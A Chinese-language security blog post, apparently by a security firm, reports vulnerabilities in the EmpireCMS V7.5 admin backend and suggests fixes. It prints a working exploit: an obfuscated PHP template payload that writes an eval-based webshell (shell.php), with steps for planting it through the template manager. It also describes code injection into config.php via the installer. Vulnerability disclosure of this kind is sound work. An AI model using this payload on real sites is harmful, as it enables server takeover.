網站安全檢測 對帝國CMS程式碼的後臺功能性安全測試
最近我們SINE安全在對帝國CMS系統進行程式碼安全審計的時候,發現該系統存在網站漏洞,受影響的版本是EmpireCMS V7.5,從帝國官方網站下載到本地,我們人工對其程式碼進行詳細的漏洞檢測與安全程式碼分析。共計發現三個高危漏洞,都是在網站的後臺管理頁面上的功能發現的。該漏洞的產生,最根源的問題是沒有對get,post提交方式進行嚴格的安全效驗與過濾,導致可以插入惡意程式碼到後端伺服器中去處理,導致漏洞的發生。
帝國CMS系統,簡單給大家介紹一下,目前很多站長,以及企業建站,都在使用該套系統,快速,便捷,易於搜尋引擎收錄,採用的是B/S架構開發,php語言+Mysql資料庫,支援大併發同時訪問,可以承載較多的使用者快速的訪問網站的各個頁面與內容,模板自定義化,可以設定標籤與自行設計網站外觀,靜態html生成,還有采集功能,深受廣大站長和網站運營者的喜歡。
我們SINE安全技術在對該程式碼進行安全檢測與滲透測試的手,會先大體看下程式碼,熟悉整個網站的架構,資料庫配置檔案,以及入口呼叫到的檔案,通常呼叫到的安全規則是如何寫的,多個方面去大體的瞭解該程式碼,目前滲透測試中,發現的網站漏洞有:SQL隱碼攻擊漏洞,網站敏感資訊洩露,初始化安裝功能漏洞,直行平行越權邏輯漏洞,任意檔案上傳漏洞,登入繞過漏洞,簡訊驗證碼漏洞,找回密碼漏洞,資料庫備份webshell,XSS跨站,CSRF漏洞等待。
首先我們檢測到的是帝國安裝程式碼功能上存在可以插入惡意程式碼漏洞,在install安裝目錄下的index.php檔案中,可以查到表的字首,也就是獲取前端提交過來的引數,然後繼續往下看,data目錄下的fun.php程式碼裡的引數並沒有做任何的安全效驗,導致可以直接插入惡意程式碼寫入到配置檔案config.php中去。漏洞詳情如下圖:
後臺還存在get webshell漏洞,開啟後臺管理功能頁面,選擇管理首頁模板,緊接著右鍵點選增加首頁方案中,複製漏洞exp程式碼:<?php $aa = _decode(ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA)${(system)($aa)};?> 解密後是:ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA=>echo '<?php eval($_REQUEST[hp]);'>shell.php
寫到模板內容頁面裡,左鍵點選提交,再點選啟用此方案,就在會e/admin/template/資料夾下生成一個shell.php檔案。
關於帝國CMS漏洞的修復辦法,對所有的get,post請求做安全過濾,也可以直接在eaddslashes2的引數裡增加惡意程式碼的攔截機制,先檢測後放行,該漏洞的利用條件是需要有後臺管理員許可權,利用的不是太多,建議對網站後臺的管理目錄進行更改,或者直接將管理員的密碼設定的複雜一些。如果您對網站漏洞修復不是太懂的話,也可以找專業的網站安全公司來處理,國內SINE安全,啟明星辰,綠盟,都是比較不錯的,網站漏洞經常出現,也請網站的運營者多多關注EmpireCMS的官方,一有補丁就立即修復掉,將安全損失降到最低。
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/31542418/viewspace-2656504/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 滲透測試公司 對PHP網站安全後門檢測PHP網站
- 帝國cms網站後臺忘記了安全提問及密碼該如何找回網站密碼
- 網站滲透測試安全檢測漏洞網站
- 網站滲透測試安全檢測方案網站
- 如何開啟帝國cms安全設定?登入帝國cms管理後臺
- 帝國cms網站忘記後臺登入認證碼、登入安全答案怎麼辦?網站
- 帝國CMS網站忘記後臺登陸密碼怎麼辦?網站密碼
- 滲透測試網站安全漏洞檢測大體方法網站
- 網站安全滲透測試檢測認證登入分析網站
- 帝國cms後臺忘記了安全提問及密碼該如何找回密碼
- 帝國CMS忘記後臺登陸安全答案怎麼辦?
- 網站安全維護對公司網站滲透測試剖析網站
- 帝國cms網站忘記後臺登入認證碼怎麼辦網站
- 帝國cms網站忘記後臺登入認證碼怎麼辦?網站
- 帝國CMS網站不想顯示後臺的“商城”選單,如何操作?網站
- 網站安全測試之APP滲透測試漏洞網站APP
- 帝國cms密碼忘記,帝國cms網站忘記登陸賬號密碼密碼網站
- 帝國cms安全設定是什麼
- 帝國CMS修改網站logo,帝國CMS Logo更換步驟網站Go
- 帝國CMS網站忘記後臺管理員帳號怎麼辦?網站
- 程式碼安全測試第十五期:跨站指令碼漏洞指令碼
- 忘記帝國CMS後臺密碼的解決方法密碼
- 滲透測試 網站安全測試行業問題分析網站行業
- 滲透測試對檔案包含漏洞網站檢測網站
- 帝國cms網站後臺報 Internal Server Error 500 錯誤怎麼辦?網站ServerError
- 2019年網站漏洞檢測報告安全分析網站
- 網站漏洞檢測 滲透測試檢測手法網站
- 微信小程式之滲透測試、加固、安全檢測微信小程式
- 什麼是網站系統安全的滲透檢測?網站
- 帝國cms原始碼怎麼檢視原始碼
- 程式碼安全測試方法有什麼?網路安全知識學習
- 網站安全漏洞測試對抓包嗅探埠講解網站
- 蘋果測試 Safari 對 HTTP 網站顯示不安全警告蘋果HTTP網站
- 帝國cms網站名稱修改不成功,如何在帝國CMS中成功修改網站名稱網站
- 帝國cms忘記了後臺密碼怎麼辦密碼
- 帝國cms後臺密碼忘記拉,怎麼辦?密碼
- 對泛微OA系統的網站安全檢測以及漏洞修復辦法網站
- 測試CMS同步測試CMS同步測試CMS同步